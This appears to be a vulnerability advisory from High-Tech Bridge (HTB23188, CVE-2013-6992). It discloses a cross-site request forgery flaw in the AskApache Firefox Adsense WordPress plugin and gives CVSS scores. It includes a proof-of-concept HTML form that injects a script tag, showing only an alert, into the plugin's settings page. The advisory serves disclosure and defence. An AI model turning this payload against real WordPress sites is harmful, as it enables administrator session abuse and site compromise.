Lucene search

High-Tech BridgeHTB23188

HistoryDec 05, 2013 - 12:00 a.m.

Сross-Site Request Forgery (CSRF) in AskApache Firefox Adsense Wordpress plugin

2013-12-0500:00:00

High-Tech Bridge

www.htbridge.com

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.004 Low

EPSS

Percentile

71.3%

JSON

High-Tech Bridge Security Research Lab discovered vulnerability in AskApache Firefox Adsense Wordpress plugin, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks.

Сross-Site Request Forgery (CSRF) in AskApache Firefox Adsense Wordpress plugin: CVE-2013-6992
The vulnerability exists due to insufficient verification of the HTTP request origin in “/wp-admin/options-general.php” script. A remote attacker can trick a logged-in administrator to visit a specially crafted page with CSRF exploit, inject and execute arbitrary HTML and script code in administrator’s browser in context of vulnerable website.
The exploitation example below injects JavaScript code, which uses the “alert()” function to display “immuniweb” word:
<form action=“http://[host]/wp-admin/options-general.php?page=askapache-firefox-ad sense.php” method=“post” name=“main”>
<input type=“hidden” name=“aafireadcode” value=‘<script>alert(“immuniweb”);</script>’>
<input type=“submit” id=“btn”>
</form>

CPENameOperatorVersion
firefox adsense wordpress pluginle3.0

CPE	Name	Operator	Version
	firefox adsense wordpress plugin	le	3.0

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.004 Low

EPSS

Percentile

71.3%

JSON

Related for HTB23188